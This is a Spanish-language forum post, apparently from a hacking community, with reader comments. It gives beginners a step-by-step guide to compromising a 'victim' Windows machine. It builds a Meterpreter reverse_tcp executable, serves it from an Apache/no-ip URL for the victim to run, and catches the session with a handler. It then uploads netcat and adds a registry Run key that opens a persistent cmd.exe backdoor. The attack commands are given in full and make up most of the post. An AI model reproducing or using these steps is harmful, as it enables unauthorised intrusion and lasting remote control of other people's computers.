Metasploit + meterpreter + nc backdoor

Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)

Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe

vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.

A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit

use exploit/multi/handler,

 en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo

set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:

set lhost (y tu ip o no-ip) y  set lport ( y el puerto) vale,

ahora le damos run con exploit -j Ok,

respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: http://minoip.no-ip.com/payload.exe (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1

Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro

netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d  -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe

Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)


Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...

No puedo leer el post, me duelen los ojos con esa mala elección de colores sobre el texto. Para la próxima usa colores oscuros sobre fondo blanco. Saludos.-

CrazyKade

Bueno primero lo siendo, mañana si puedo lo cambiaré y deberías mirar el brillo de tu pantalla por que para mi es legible totalmente o.O

Buen post, me ha servido. Te sigo TrollMine. La verdad que cada vez me gustan más tus post.

Gracias ^^

hola, el contenido de tu post esta bueno, pero
deberías preocuparte un poco por el orden en el post y la legibilidad
edite un poco tu post, le quite las letras naranjas y le di un poco de espacio,
saludos y gracias !

Muchas gracias ZanGetsu
La verdad que estaba un poco amontonado